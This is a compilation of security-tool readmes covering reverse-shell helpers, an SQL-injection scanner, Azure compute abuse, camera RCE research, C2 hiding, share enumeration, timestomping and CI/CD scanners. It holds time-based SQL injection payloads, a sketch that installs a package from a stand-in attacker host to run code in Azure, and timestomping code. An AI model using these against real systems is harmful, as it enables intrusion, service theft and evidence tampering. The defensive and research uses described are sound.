secbutler
secbutler is a utility tool made for pentesters, bug-bounty hunters, and security researchers. It bundles the most-used and most tedious tasks commonly performed during cybersecurity activities: installing security-related tools, retrieving commands for reverse shells, serving common payloads, obtaining a working proxy, managing wordlists, and so forth.
The goal is to obtain a tool that meets the requirements of the community, therefore suggestions and PRs are very welcome!
secbutler -h
This will display the help for the tool
__ __ __
________ _____/ /_ __ __/ /_/ /__ _____
/ ___/ _ \/ ___/ __ \/ / / / __/ / _ \/ ___/
(__ ) __/ /__/ /_/ / /_/ / /_/ / __/ /
/____/\___/\___/_.___/\__,_/\__/_/\___/_/
v0.1.9 - https://github.com/groundsec/secbutler
Essential utilities for pentester, bug-bounty hunters and security researchers
Usage:
secbutler [flags]
secbutler [command]
Available Commands:
cheatsheet Read common cheatsheets & payloads
help Help about any command
listener Obtain the command to start a reverse shell listener
payloads Obtain and serve common payloads
proxy Obtain a random proxy from FreeProxy
revshell Obtain the command for a reverse shell
tools Generate a install script for the most common cybersecurity tools
version Print the current version
wordlists Generate a download script for the most common wordlists
Flags:
-h, --help help for secbutler
Use "secbutler [command] --help" for more information about a command.
Run the following command to install the latest version:
go install github.com/groundsec/secbutler@latest
Or you can simply grab an executable from the Releases page.
secbutler is made with ❤️ by the GroundSec team and released under the MIT LICENSE.
SqliSniper is a robust Python tool designed to detect time-based blind SQL injections in HTTP request headers. It enhances the security assessment process by rapidly scanning and identifying potential vulnerabilities using multi-threading, ensuring speed and efficiency. Unlike other scanners, SqliSniper is designed to eliminate false positives and to send alerts upon detection through its built-in Discord notification functionality.
git clone https://github.com/danialhalo/SqliSniper.git
cd SqliSniper
chmod +x sqlisniper.py
pip3 install -r requirements.txt
This will display help for the tool. Here are all the options it supports.
ubuntu:~/sqlisniper$ ./sqlisniper.py -h
[SqliSniper ASCII-art banner]
-: By Muhammad Danial :-
usage: sqlisniper.py [-h] [-u URL] [-r URLS_FILE] [-p] [--proxy PROXY] [--payload PAYLOAD] [--single-payload SINGLE_PAYLOAD] [--discord DISCORD] [--headers HEADERS]
[--threads THREADS]
Detect SQL injection by sending malicious queries
options:
-h, --help show this help message and exit
-u URL, --url URL Single URL for the target
-r URLS_FILE, --urls_file URLS_FILE
File containing a list of URLs
-p, --pipeline Read from pipeline
--proxy PROXY Proxy for intercepting requests (e.g., http://127.0.0.1:8080)
--payload PAYLOAD File containing malicious payloads (default is payloads.txt)
--single-payload SINGLE_PAYLOAD
Single payload for testing
--discord DISCORD Discord Webhook URL
--headers HEADERS File containing headers (default is headers.txt)
--threads THREADS Number of threads
The URL can be provided with the -u flag for a single-site scan:
./sqlisniper.py -u http://example.com
The -r flag allows SqliSniper to read a file containing multiple URLs for simultaneous scanning:
./sqlisniper.py -r url.txt
SqliSniper can also work with pipeline input using the -p flag:
cat url.txt | ./sqlisniper.py -p
The pipeline feature facilitates seamless integration with other tools. For instance, you can utilize tools like subfinder and httpx, and then pipe their output to SqliSniper for mass scanning.
subfinder -silent -d google.com | sort -u | httpx -silent | ./sqlisniper.py -p
By default, SqliSniper uses the payloads.txt file. However, the --payload flag can be used to provide a custom payloads file:
./sqlisniper.py -u http://example.com --payload mssql_payloads.txt
While using a custom payloads file, ensure that you substitute the sleep time with %__TIME_OUT__%. SqliSniper dynamically adjusts the sleep time iteratively to mitigate potential false positives. The payloads file should look like this:
ubuntu:~/sqlisniper$ cat payloads.txt
0\"XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR\"Z
"0"XOR(if(now()=sysdate()%2Csleep(%__TIME_OUT__%)%2C0))XOR"Z"
0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z
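For illustration, the timing check behind %__TIME_OUT__% can be sketched in a few lines of Python. This is a hedged sketch of the general technique, not SqliSniper's actual code; the target URL, header name, and sleep values are placeholders.

import time
import requests

PAYLOAD = "0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z"

def is_delayed(url, header, seconds):
    # Substitute the marker with a concrete sleep value and time the response
    value = PAYLOAD.replace("%__TIME_OUT__%", str(seconds))
    start = time.time()
    try:
        requests.get(url, headers={header: value}, timeout=seconds + 10)
    except requests.exceptions.Timeout:
        pass
    return time.time() - start >= seconds

# Re-testing with increasing sleep times weeds out slow-but-benign responses
if all(is_delayed("http://example.com", "User-Agent", t) for t in (5, 10)):
    print("likely time-based SQLi in User-Agent")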
If you want to test with only a single payload, the --single-payload flag can be used. Make sure to replace the sleep time with %__TIME_OUT__%:
./sqlisniper.py -r url.txt --single-payload "0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z"
Headers are read from the headers.txt file. To scan a custom header, add the custom HTTP request header to the headers.txt file.
ubuntu:~/sqlisniper$ cat headers.txt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
X-Forwarded-For: 127.0.0.1
SqliSniper also offers Discord alert notifications, enhancing its functionality by providing real-time alerts through Discord webhooks. This feature proves invaluable during large-scale scans, allowing prompt notifications upon detection.
./sqlisniper.py -r url.txt --discord <web_hookurl>
Threads can be defined with the --threads flag:
./sqlisniper.py -r url.txt --threads 10
Note: It is crucial to consider that employing a higher number of threads might lead to potential false positives or overlooking valid issues. Due to the nature of time-based SQL injection, it is recommended to use a lower thread count for more accurate detection.
SqliSniper is made in Python with lots of <3 by @Muhammad Danial.
Execute code within Azure Automation service without getting charged
CloudMiner is a tool designed to get free computing power within Azure Automation service. The tool utilizes the upload module/package flow to execute code which is totally free to use. This tool is intended for educational and research purposes only and should be used responsibly and with proper authorization.
This flow was reported to Microsoft on 3/23, which decided not to change the service behavior as it's considered "by design". As of 3/9/23, this tool can still be used without getting charged.
Each execution is limited to 3 hours
Install CloudMiner along with its requirements.txt dependencies:
pip install .
usage: cloud_miner.py [-h] --path PATH --id ID -c COUNT [-t TOKEN] [-r REQUIREMENTS] [-v]
CloudMiner - Free computing power in Azure Automation Service
optional arguments:
-h, --help show this help message and exit
--path PATH the script path (Powershell or Python)
--id ID id of the Automation Account - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Automation/automationAccounts/{automationAccountName}
-c COUNT, --count COUNT
number of executions
-t TOKEN, --token TOKEN
Azure access token (optional). If not provided, token will be retrieved using the Azure CLI
-r REQUIREMENTS, --requirements REQUIREMENTS
Path to requirements file to be installed and use by the script (relevant to Python scripts only)
-v, --verbose Enable verbose mode
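To make the upload flow concrete, here is a rough sketch of what a package upload against the Azure Automation management API can look like in Python. The endpoint shape and api-version are assumptions based on the public Azure Automation REST documentation, not CloudMiner's source, so verify them before relying on this.

import requests

# Assumptions: ACCOUNT_ID is the resource ID passed to --id, TOKEN is an ARM
# access token (e.g. from `az account get-access-token`), and the package
# archive is reachable at CONTENT_URI. Endpoint and api-version are taken from
# public Azure Automation REST docs and may differ from what CloudMiner uses.
ACCOUNT_ID = "/subscriptions/<sub>/resourceGroups/<rg>/providers/Microsoft.Automation/automationAccounts/<name>"
TOKEN = "<arm-access-token>"
CONTENT_URI = "https://attacker.example/package.tar.gz"

resp = requests.put(
    f"https://management.azure.com{ACCOUNT_ID}/python3Packages/mypkg",
    params={"api-version": "2022-08-08"},
    headers={"Authorization": f"Bearer {TOKEN}"},
    json={"properties": {"contentLink": {"uri": CONTENT_URI}}},
)
# The package's setup code runs inside the service sandbox during installation
print(resp.status_code, resp.text)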
CloudMiner is released under the BSD 3-Clause License. Feel free to modify and distribute this tool responsibly, while adhering to the license terms.
Faraday's researchers Javier Aguinaga and Octavio Gianatiempo have investigated IP cameras and found two high-severity vulnerabilities.
This research project began when Aguinaga's wife, a former research leader at Faraday Security, informed him that their IP camera had stopped working. Although Javier was initially asked to fix it, being a security researcher, he opted for a more unconventional approach to the problem. He brought the camera to their office and discussed the issue with Gianatiempo, another security researcher at Faraday. The situation quickly escalated from some light reverse engineering to a full-fledged vulnerability research project, which ended with two high-severity bugs and an exploitation strategy worthy of the big screen.
They uncovered two LAN remote code execution vulnerabilities in EZVIZ's implementation of Hikvision's Search Active Devices Protocol (SADP) and SDK server:
The affected code is present in several EZVIZ products, which include but are not limited to:
Product Model | Affected Versions |
---|---|
CS-C6N-B0-1G2WF | Versions below V5.3.0 build 230215 |
CS-C6N-R101-1G2WF | Versions below V5.3.0 build 230215 |
CS-CV310-A0-1B2WFR | Versions below V5.3.0 build 230221 |
CS-CV310-A0-1C2WFR-C | Versions below V5.3.2 build 230221 |
CS-C6N-A0-1C2WFR-MUL | Versions below V5.3.2 build 230218 |
CS-CV310-A0-3C2WFRL-1080p | Versions below V5.2.7 build 230302 |
CS-CV310-A0-1C2WFR Wifi IP66 2.8mm 1080p | Versions below V5.3.2 build 230214 |
CS-CV248-A0-32WMFR | Versions below V5.2.3 build 230217 |
EZVIZ LC1C | Versions below V5.3.4 build 230214 |
These vulnerabilities affect IP cameras and can be used to execute code remotely, so they drew inspiration from the movies and decided to recreate an attack often seen in heist films. The hacker in the group is responsible for hijacking the cameras and modifying the feed to avoid detection. Take, for example, this famous scene from Ocean's Eleven:
Exploiting either of these vulnerabilities, Javier and Octavio served a victim an arbitrary video stream by tunneling their connection with the camera into an attacker-controlled server, while leaving all other camera features operational. A detailed deep dive into the whole research process can be found in these slides and code. It covers firmware analysis, vulnerability discovery, building a toolchain to compile a debugger for the target, and developing an exploit capable of bypassing ASLR, plus all the details about the Hollywood-style post-exploitation, including tracing, in-memory code patching, and manipulating the execution of the binary that implements most of the camera features.
This research shows that memory corruption vulnerabilities still abound on embedded and IoT devices, even on products marketed for security applications like IP cameras. Memory corruption vulnerabilities can be detected by static analysis, and implementing secure development practices can reduce their occurrence. These approaches are standard in other industries, evidencing that security is not a priority for embedded and IoT device manufacturers, even when developing security-related products. By filling the gap between IoT hacking and the big screen, this research questions the integrity of video surveillance systems and hopes to raise awareness about the security risks posed by these kinds of devices.
BounceBack is a powerful, highly customizable and configurable reverse proxy with WAF functionality for hiding your C2/phishing/etc infrastructure from blue teams, sandboxes, scanners, etc. It uses real-time traffic analysis through various filters and their combinations to hide your tools from illegitimate visitors.
The tool is distributed with preconfigured lists of blocked words, blocked and allowed IP addresses.
For more information on tool usage, you may visit the project's wiki.
BounceBack currently supports the following filters:
Custom rules may be easily added: just register your RuleBaseCreator or RuleWrapperCreator. See the already created RuleBaseCreators and RuleWrapperCreators.
Rules configuration page may be found here.
At the moment, BounceBack supports the following protocols:
Custom protocols may be easily added: just register your new type in the manager. Example proxy implementations may be found here.
Proxies configuration page may be found here.
Just download the latest release from the releases page, unzip it, edit the config file, and go.
If you want to build it from source, install goreleaser and run:
goreleaser release --clean --snapshot
Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain
Built upon djhohnstein's SharpShares project
> .\SharpShares.exe help
Usage:
SharpShares.exe /threads:50 /ldap:servers /ou:"OU=Special Servers,DC=example,DC=local" /filter:SYSVOL,NETLOGON,IPC$,PRINT$ /verbose /outfile:C:\path\to\file.txt
Optional Arguments:
/threads - specify maximum number of parallel threads (default=25)
/dc - specify domain controller to query (if not ran on a domain-joined host)
/domain - specify domain name (if not ran on a domain-joined host)
/ldap - query hosts from the following LDAP filters (default=all)
:all - All enabled computers with 'primary' group 'Domain Computers'
:dc - All enabled Domain Controllers (not read-only DCs)
:exclude-dc - All enabled computers that are not Domain Controllers or read-only DCs
:servers - All enabled servers
:servers-exclude-dc - All enabled servers excluding Domain Controllers or read-only DCs
/ou - specify LDAP OU to query enabled computer objects from
ex: "OU=Special Servers,DC=example,DC=local"
/stealth - list share names without performing read/write access checks
/filter - list of comma-separated shares to exclude from enumeration
default: SYSVOL,NETLOGON,IPC$,PRINT$
/outfile - specify file for shares to be appended to instead of printing to std out
/verbose - return unauthorized shares
execute-assembly /path/to/SharpShares.exe /ldap:all /filter:sysvol,netlogon,ipc$,print$
The /ldap and /ou flags can be used together or separately to generate a list of hosts to enumerate.
All hosts returned from these flags are combined and deduplicated before enumeration starts.
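For readers who want to replicate the host-selection step outside of .NET, an LDAP query along these lines approximates /ldap:servers. This is shown with Python's ldap3; the exact filters SharpShares builds may differ, and the hostnames and credentials are placeholders.

from ldap3 import Server, Connection, SUBTREE, NTLM

# Rough equivalent of /ldap:servers; UAC bit 2 (ACCOUNTDISABLE) excludes
# disabled machine accounts
server = Server("dc.example.local")
conn = Connection(server, user="EXAMPLE\\user", password="Passw0rd!",
                  authentication=NTLM, auto_bind=True)
conn.search(
    "DC=example,DC=local",
    "(&(objectCategory=computer)(operatingSystem=*server*)"
    "(!(userAccountControl:1.2.840.113556.1.4.803:=2)))",
    search_scope=SUBTREE,
    attributes=["dNSHostName"],
)
for entry in conn.entries:
    print(entry.dNSHostName)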
navgix is a multi-threaded Go tool that checks for nginx alias traversal vulnerabilities.
Currently, navgix supports two techniques for finding vulnerable directories (or location aliases):
navgix will make an initial GET request to the page, and if there are any directories specified on the page HTML (specified in src attributes on html components), it will test each folder in the path for the vulnerability, therefore if it finds a link to /static/img/photos/avatar.png, it will test /static/, /static/img/ and /static/img/photos/.
navgix will also test a short list of directories that commonly have this vulnerability, and if any of these directories exist, it will attempt to confirm whether a vulnerability is present.
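As an illustration of the first technique, the per-directory probing can be sketched in Python. This is a conceptual sketch of nginx off-by-slash probing, not navgix's actual code; the URL and status-code expectations are assumptions.

import requests

def probe(base, path):
    # For /static/img/photos/avatar.png, probe /static../, /static/img../, ...
    parts = [p for p in path.split("/") if p]
    for i in range(1, len(parts)):  # directory prefixes only, skip the filename
        prefix = "/" + "/".join(parts[:i])
        candidate = base + prefix + "../"
        r = requests.get(candidate, allow_redirects=False)
        # Where a clean 404 is expected, a 200/403 hints that the alias
        # directive is appending the traversal to the filesystem path
        if r.status_code in (200, 403):
            print(f"possible alias traversal at {prefix}/ -> {candidate}")

probe("http://example.com", "/static/img/photos/avatar.png")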
git clone https://github.com/Hakai-Offsec/navgix; cd navgix;
go build
This repo contains the code for our USENIX Security '23 paper "ARGUS: A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions". Argus is a comprehensive security analysis tool specifically designed for GitHub Actions. Built with an aim to enhance the security of CI/CD workflows, Argus utilizes taint-tracking techniques and an impact classifier to detect potential vulnerabilities in GitHub Action workflows.
Visit our website - secureci.org for more information.
Taint-Tracking: Argus uses sophisticated algorithms to track the flow of potentially untrusted data from specific sources to security-critical sinks within GitHub Actions workflows. This enables the identification of vulnerabilities that could lead to code injection attacks.
Impact Classifier: Argus classifies identified vulnerabilities into High, Medium, and Low severity classes, providing a clearer understanding of the potential impact of each identified vulnerability. This is crucial in prioritizing mitigation efforts.
This Python script provides a command line interface for interacting with GitHub repositories and GitHub actions.
python argus.py --mode [mode] --url [url] [--output-folder path_to_output] [--config path_to_config] [--verbose] [--branch branch_name] [--commit commit_hash] [--tag tag_name] [--action-path path_to_action] [--workflow-path path_to_workflow]
--mode: The mode of operation. Choose either 'repo' or 'action'. This parameter is required.
--url: The GitHub URL. Use USERNAME:TOKEN@URL for private repos. This parameter is required.
--output-folder: The output folder. The default value is '/tmp'. This parameter is optional.
--config: The config file. This parameter is optional.
--verbose: Verbose mode. If this option is provided, the logging level is set to DEBUG. Otherwise, it is set to INFO. This parameter is optional.
--branch: The branch name. You must provide exactly one of: --branch, --commit, --tag. This parameter is optional.
--commit: The commit hash. You must provide exactly one of: --branch, --commit, --tag. This parameter is optional.
--tag: The tag. You must provide exactly one of: --branch, --commit, --tag. This parameter is optional.
--action-path: The (relative) path to the action. You cannot provide --action-path in repo mode. This parameter is optional.
--workflow-path: The (relative) path to the workflow. You cannot provide --workflow-path in action mode. This parameter is optional.
To use this script to interact with a GitHub repo, you might run a command like the following:
python argus.py --mode repo --url https://github.com/username/repo.git --branch master
This would run the script in repo mode on the master branch of the specified repository.
Argus can be run inside a Docker container; the results will be available in the results folder.
You can view SARIF results either through an online viewer or with a Visual Studio Code (VSCode) extension.
Online Viewer: The SARIF Web Viewer is an online tool that allows you to visualize SARIF files. You can upload your SARIF file (argus_report.sarif) directly to the website to view the results.
VSCode Extension: If you prefer to use VSCode, you can install the SARIF Viewer extension. After installing the extension, you can open your SARIF file (argus_report.sarif) in VSCode. The results will appear in the SARIF Explorer pane, which provides a detailed and navigable view of the results.
Remember to handle the SARIF file with care, especially if it contains sensitive information from your codebase.
If there is an issue with needing GitHub authorization for running, you can provide username:TOKEN in the GITHUB_CREDS environment variable. This will be used for all requests made to GitHub. Note: we do not store this information anywhere, nor create anything in the GitHub account; we only use this for cloning the repositories.
Argus is an open-source project, and we welcome contributions from the community. Whether it's reporting a bug, suggesting a feature, or writing code, your contributions are always appreciated!
If you use Argus in your research, please cite our paper:
@inproceedings{muralee2023Argus,
title={ARGUS: A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions},
author={S. Muralee, I. Koishybayev, A. Nahapetyan, G. Tystahl, B. Reaves, A. Bianchi, W. Enck,
A. Kapravelos, A. Machiry},
booktitle={32nd USENIX Security Symposium (USENIX Security 23)},
year={2023},
}
Nemesis is an offensive data enrichment pipeline and operator support system.
Built on Kubernetes with scale in mind, our goal with Nemesis was to create a centralized data processing platform that ingests data produced during offensive security assessments.
Nemesis aims to automate a number of repetitive tasks operators encounter on engagements, empower operatorsβ analytic capabilities and collective knowledge, and create structured and unstructured data stores of as much operational data as possible to help guide future research and facilitate offensive data analysis.
See the setup instructions.
See development.md
Post Name | Publication Date | Link |
---|---|---|
Hacking With Your Nemesis | Aug 9, 2023 | https://posts.specterops.io/hacking-with-your-nemesis-7861f75fcab4 |
Challenges In Post-Exploitation Workflows | Aug 2, 2023 | https://posts.specterops.io/challenges-in-post-exploitation-workflows-2b3469810fe9 |
On (Structured) Data | Jul 26, 2023 | https://posts.specterops.io/on-structured-data-707b7d9876c6 |
Nemesis is built on a large chunk of other people's work. Throughout the codebase we've provided citations, references, and applicable licenses for anything used or adapted from public sources. If we've forgotten proper credit anywhere, please let us know or submit a pull request!
We also want to acknowledge Evan McBroom, Hope Walker, and Carlo Alcantara from SpecterOps for their help with the initial Nemesis concept and amazing feedback throughout the development process.
Attackers are abusing MySQL instances to conduct nefarious operations on the Internet. The cybercriminals are targeting exposed MySQL instances and triggering infections at scale to exfiltrate data, destroy data, and extort money via ransom. For example, one of the most significant threats MySQL deployments face is ransomware. We have authored a tool named "MELEE" to detect potential infections in MySQL instances. The tool allows security researchers, penetration testers, and threat intelligence experts to detect compromised and infected MySQL instances running malicious code. The tool also enables you to conduct efficient research in the field of malware targeting cloud databases. In this release of the tool, the following modules are supported:
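As a rough illustration of the kind of check such modules perform, a minimal Python sketch that connects to an exposed instance and looks for common ransom-note artifacts might look like this. The marker strings and target address are assumptions, not MELEE's actual logic.

import pymysql

# Connect to an exposed instance (placeholder address/credentials)
conn = pymysql.connect(host="203.0.113.10", user="root", password="", port=3306)
with conn.cursor() as cur:
    cur.execute("SHOW DATABASES")
    dbs = [row[0] for row in cur.fetchall()]
conn.close()

# Ransomware campaigns often drop a database/table holding a ransom note;
# names like PLEASE_READ_ME vary between campaigns
markers = [d for d in dbs if "READ" in d.upper() or "RECOVER" in d.upper()]
if markers:
    print(f"possible ransomware infection, suspicious databases: {markers}")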
Tool for analyzing SAP Secure Network Communications (SNC).
In its current state, sncscan can be used to read the SNC configurations for SAP Router and DIAG (SAP GUI) connections. The implementation for the SAP RFC protocol is currently in development.
SAP Routers can either support SNC or not; a more granular configuration of the SNC parameters is not possible. Nevertheless, sncscan can find out if it is activated:
sncscan -H 10.3.161.4 -S 3299 -p router
The SNC configuration of a DIAG connection used by a SAP GUI can have more versatile settings than the router configuration. A detailed overview of the system parameters that can be read with sncscan and that impact the connection's security is in the Background section.
sncscan -H 10.3.161.3 -S 3200 -p diag
Multiple targets can be scanned with one command:
sncscan -L /H/192.168.56.101/S/3200,/H/192.168.56.102/S/3206
sncscan --route-string /H/10.3.161.5/S/3299/H/10.3.161.3/S/3200 -p diag
Requirements: Currently, sncscan only works with the pysap library from our fork.
python3 -m pip install -r requirements.txt
or
python3 setup.py test
python3 setup.py install
SAP protocols, such as DIAG or RFC, do not provide high security themselves. To increase security and ensure Authentication, Integrity and Encryption, the use of SNC (Secure Network Communications) is required. SNC protects the data communication paths between various client and server components of the SAP system that use the RFC, DIAG or router protocol by applying known cryptographic algorithms to the data in order to increase its security. There are three different levels of data protection, that can be applied for an SNC secured connection:
Each SAP system can be configured with SNC parameters for the communication security. The level of the SNC connection is determined by the Quality of Protection parameters:
Additional SNC parameters can be used for further system-specific configuration options, including the snc/only_encrypted_gui parameter, which ensures that encrypted SAPGUI connections are enforced.
As long as a SAP System is addressed that is capable of sending SNC messages, it also responds to valid SNC requests, regardless of which IP, port, and CN were specified for SNC. This response contains the requirements that the SAP system has for the SNC connection, which can then be used to obtain the SNC parameters. This can be used to find out whether an SAP system has SNC enabled and, if so, which SNC parameters have been set.
A PowerShell function to perform timestomping on specified files and directories. The function can modify timestamps recursively for all files in a directory.
I've ported Stompy to C#, Python and Go and the relevant versions are linked in this repo with their own readme.
-Path: The path to the file or directory whose timestamps you wish to modify.
-NewTimestamp: The new DateTime value you wish to set for the file or directory.
-Credentials: (Optional) If you need to specify a different user's credentials.
-Recurse: (Switch) If specified, apply the timestamp recursively to all files in the given directory.
Specify the -Recurse switch to apply timestamps recursively:
Invoke-Stompy -Path "C:\path\to\file.txt" -NewTimestamp "01/01/2023 12:00:00 AM"
Invoke-Stompy -Path "C:\path\to\file.txt" -NewTimestamp "01/01/2023 12:00:00 AM" -Recurse
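The readme mentions C#, Python, and Go ports; purely as an illustration of the core idea (not the actual ported code), a minimal Python sketch could look like this. Note that os.utime only sets access/modification times; creation time needs platform-specific APIs.

import os
from datetime import datetime

def stomp(path, new_time, recurse=False):
    ts = new_time.timestamp()
    targets = [path]
    if recurse and os.path.isdir(path):
        # Collect every file under the directory, mirroring -Recurse
        for root, _dirs, files in os.walk(path):
            targets.extend(os.path.join(root, f) for f in files)
    for t in targets:
        os.utime(t, (ts, ts))  # sets (atime, mtime)

stomp(r"C:\path\to\file.txt", datetime(2023, 1, 1, 0, 0, 0))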
With the rapidly increasing variety of attack techniques and a simultaneous rise in the number of detection rules offered by EDRs (Endpoint Detection and Response) and custom-created ones, the need for constant functional testing of detection rules has become evident. However, manually re-running these attacks and cross-referencing them with detection rules is a labor-intensive task which is worth automating.
To address this challenge, I developed "PurpleKeep," an open-source initiative designed to facilitate the automated testing of detection rules. Leveraging the capabilities of the Atomic Red Team project, which allows simulating attacks following MITRE TTPs (Tactics, Techniques, and Procedures), PurpleKeep enhances the simulation of these TTPs to serve as a starting point for evaluating the effectiveness of detection rules.
Automating the process of simulating one or multiple TTPs in a test environment comes with certain challenges, one of which is the contamination of the platform after multiple simulations. However, PurpleKeep aims to overcome this hurdle by streamlining the simulation process and facilitating the creation and instrumentation of the targeted platform.
Primarily developed as a proof of concept, PurpleKeep serves as an End-to-End Detection Rule Validation platform tailored for an Azure-based environment. It has been tested in combination with the automatic deployment of Microsoft Defender for Endpoint as the preferred EDR solution. PurpleKeep also provides support for security and audit policy configurations, allowing users to mimic the desired endpoint environment.
To facilitate analysis and monitoring, PurpleKeep integrates with Azure Monitor and Log Analytics services to store the simulation logs and allow further correlation with any events and/or alerts stored in the same platform.
TLDR: PurpleKeep provides an Attack Simulation platform to serve as a starting point for your End-to-End Detection Rule Validation in an Azure-based environment.
The project is based on Azure Pipelines and requires the following to be able to run:
You can provide a security and/or audit policy file that will be loaded to mimic your Group Policy configurations. Use the Secure File option of the Library in Azure DevOps to make it accessible to your pipelines.
Refer to the variables file for your configurable items.
Deploying the infrastructure uses the Azure Pipeline to perform the following steps:
Currently only the Atomics from the public repository are supported. The pipeline takes a Technique ID as input, or a comma-separated list of techniques, for example:
The logs of the simulation are ingested into the AtomicLogs_CL table of the Log Analytics Workspace.
There are currently two ways to run the simulation:
This pipeline will deploy a fresh platform after the simulation of each TTP. The Log Analytics workspace will maintain the logs of each run.
Warning: this will onboard a large number of hosts into your EDR
A fresh infrastructure will be deployed only at the beginning of the pipeline. All TTPs will be simulated on this instance. This is the fastest way to simulate and prevents onboarding a large number of devices; however, running a lot of simulations in the same environment risks contaminating the environment and making the simulations less stable and predictable.
RAVEN (Risk Analysis and Vulnerability Enumeration for CI/CD) is a powerful security tool designed to perform massive scans for GitHub Actions CI workflows and digest the discovered data into a Neo4j database. Developed and maintained by the Cycode research team.
With Raven, we were able to identify and report security vulnerabilities in some of the most popular repositories hosted on GitHub, including:
We listed all vulnerabilities discovered using Raven in the tool Hall of Fame.
The tool provides the following capabilities to scan and analyze potential CI/CD vulnerabilities:
Possible usages for Raven:
This tool provides a reliable and scalable solution for CI/CD security analysis, enabling users to query bad configurations and gain valuable insights into their codebase's security posture.
In the past year, Cycode Labs conducted extensive research on fundamental security issues of CI/CD systems. We examined the depths of many systems, thousands of projects, and several configurations. The conclusion is clear: the model in which security is delegated to developers has failed. This has been proven several times in our previous content:
Each of the vulnerabilities above has unique characteristics, making it nearly impossible for developers to stay up to date with the latest security trends. Unfortunately, each vulnerability shares a commonality: each exploitation can impact millions of victims.
It was for these reasons that Raven was created, a framework for CI/CD security analysis workflows (and GitHub Actions as the first use case). In our focus, we examined complex scenarios where each issue isn't a threat on its own, but when combined, they pose a severe threat.
To get started with Raven, follow these installation instructions:
Step 1: Install the Raven package
pip3 install raven-cycode
Step 2: Setup a local Redis server and Neo4j database
docker run -d --name raven-neo4j -p7474:7474 -p7687:7687 --env NEO4J_AUTH=neo4j/123456789 --volume raven-neo4j:/data neo4j:5.12
docker run -d --name raven-redis -p6379:6379 --volume raven-redis:/data redis:7.2.1
Another way to setup the environment is by running our provided docker compose file:
git clone https://github.com/CycodeLabs/raven.git
cd raven
make setup
Step 3: Run Raven Downloader
Org mode:
raven download org --token $GITHUB_TOKEN --org-name RavenDemo
Crawl mode:
raven download crawl --token $GITHUB_TOKEN --min-stars 1000
Step 4: Run Raven Indexer
raven index
Step 5: Inspect the results through the reporter
raven report --format raw
At this point, it is possible to inspect the data in the Neo4j database by connecting to http://localhost:7474/browser/.
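You can also query the graph programmatically with the official Neo4j Python driver, using the defaults from the docker command above. This is a minimal sketch; the generic Cypher below deliberately makes no assumptions about Raven's node labels.

from neo4j import GraphDatabase

driver = GraphDatabase.driver("neo4j://localhost:7687", auth=("neo4j", "123456789"))
with driver.session() as session:
    # Count nodes per label to get a feel for the indexed graph
    result = session.run(
        "MATCH (n) RETURN labels(n) AS labels, count(*) AS c ORDER BY c DESC LIMIT 10"
    )
    for record in result:
        print(record["labels"], record["c"])
driver.close()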
Raven uses two primary Docker containers: Redis and Neo4j. make setup will run a docker compose command to prepare that environment.
The tool contains three main functionalities: download, index, and report.
usage: raven download org [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] --org-name ORG_NAME
options:
-h, --help show this help message and exit
--token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
--debug Whether to print debug statements, default: False
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--org-name ORG_NAME Organization name to download the workflows
usage: raven download crawl [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--max-stars MAX_STARS] [--min-stars MIN_STARS]
options:
-h, --help show this help message and exit
--token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
--debug Whether to print debug statements, default: False
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--max-stars MAX_STARS
Maximum number of stars for a repository
--min-stars MIN_STARS
Minimum number of stars for a repository, default : 1000
usage: raven index [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI] [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS]
[--clean-neo4j] [--debug]
options:
-h, --help show this help message and exit
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--neo4j-uri NEO4J_URI
Neo4j URI endpoint, default: neo4j://localhost:7687
--neo4j-user NEO4J_USER
Neo4j username, default: neo4j
--neo4j-pass NEO4J_PASS
Neo4j password, default: 123456789
--clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False
--debug Whether to print debug statements, default: False
usage: raven report [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI]
[--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS] [--clean-neo4j]
[--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}]
[--severity {info,low,medium,high,critical}] [--queries-path QUERIES_PATH] [--format {raw,json}]
{slack} ...
positional arguments:
{slack}
slack Send report to slack channel
options:
-h, --help show this help message and exit
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--neo4j-uri NEO4J_URI
Neo4j URI endpoint, default: neo4j://localhost:7687
--neo4j-user NEO4J_USER
Neo4j username, default: neo4j
--neo4j-pass NEO4J_PASS
Neo4j password, default: 123456789
--clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False
--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}, -t {injection,unauthenticated,fixed,priv-esc,supply-chain}
Filter queries with specific tag
--severity {info,low,medium,high,critical}, -s {info,low,medium,high,critical}
Filter queries by severity level (default: info)
--queries-path QUERIES_PATH, -dp QUERIES_PATH
Queries folder (default: library)
--format {raw,json}, -f {raw,json}
Report format (default: raw)
Retrieve all workflows and actions associated with the organization.
